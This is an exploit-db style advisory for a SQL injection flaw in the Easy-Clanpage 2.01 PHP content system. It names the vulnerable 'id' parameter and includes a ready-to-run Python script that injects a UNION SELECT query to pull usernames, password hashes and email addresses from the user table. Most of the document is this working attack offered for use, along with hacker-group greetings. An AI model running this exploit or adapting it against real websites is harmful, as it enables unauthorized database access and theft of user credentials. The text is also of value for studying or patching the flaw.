Easy-Clanpage 2.01 – SQL Injection

  • 作者: Easy Laster
    日期: 2010-03-25
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/11875/
  • ----------------------------Information------------------------------------------------
    +Name : Easy-Clanpage <= v2.01 SQL Injection Exploit
    +Autor : Easy Laster
    +Date : 25.03.2010
    +Script Easy-Clanpage <= v2.01
    +Download : Update Version 2.0->2.01 : http://www.easy-clanpage.de/?section=
    +Price : for free
    +Language : PHP
    +Discovered by Easy Laster
    +Security Group 4004-Security-Project
    +Greetz to Team-Internet ,Underground Agents
    +And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
    Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
     ___ ___ ___ ___ _ _ _____ _ _ 
    | | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|_|___ ___|_|___ ___| |_
    |_| | | | |_|___|_ -| -_|_| | |_| |_| | |___| __|_| . | | | -_|_|_|
    |_|___|___| |_| |___|___|___|___|_| |_|_| |_| |__||_| |___|_| |___|___|_| 
    |___| |___| 
    +Vulnerability : http://www.site.com/Easy-Clanpage/?section=user&action=details&id=
    #SQL Injection
    +Exploitable : http://www.site.com/Easy-Clanpage/?section=user&action=details&id=1
    #SQL Injection Exploit
    #!/usr/bin/env python
    #-*- coding:utf-8 -*-
    import sys, urllib2, re
    if len(sys.argv) < 2:
    print "***************************************************************"
    print "************ Easy-Clanpage v2.01 Profil Page Hack *************"
    print "***************************************************************"
    print "* Discovered and vulnerability by Easy Laster *"
    print "*coded by Dr.ChAoS*"
    print "* *"
    print "*<=Usage=>*"
    print "* python exploit.py http://site.de/ecp/ <userid, default=1> *"
    print "* *"
    print "***************************************************************"
    if len(sys.argv) < 3:
    id = 1
    id = sys.argv[2]
    site = sys.argv[1]
    if site[-1:] != "/":
    site += "/"
    url = site + "index.php?section=user&action=details&id=1+and+1=0+union+select+concat(0x23,0x23,0x23,0x23,0x23,username,0x3a,password,0x3a,email,0x23,0x23,0x23,0x23,0x23)+from+ecp_user+where+userID=" + str(id) + "--"
    print "Exploiting..."
    html = urllib2.urlopen(url).read()
    # I hate regex!
    data = re.findall(r"#####(.*)\:([0-9a-fA-F]{32})\:(.*)#####\:", html)
    if len(data) > 0:
    print "Success!\n"
    print "ID: " + str(id)
    print "Username: " + data[0][0]
    print "Password: " + data[0][1]
    print "E-Mail: " + data[0][2]
    print "\nHave a nice day!"
    print "Exploit failed..."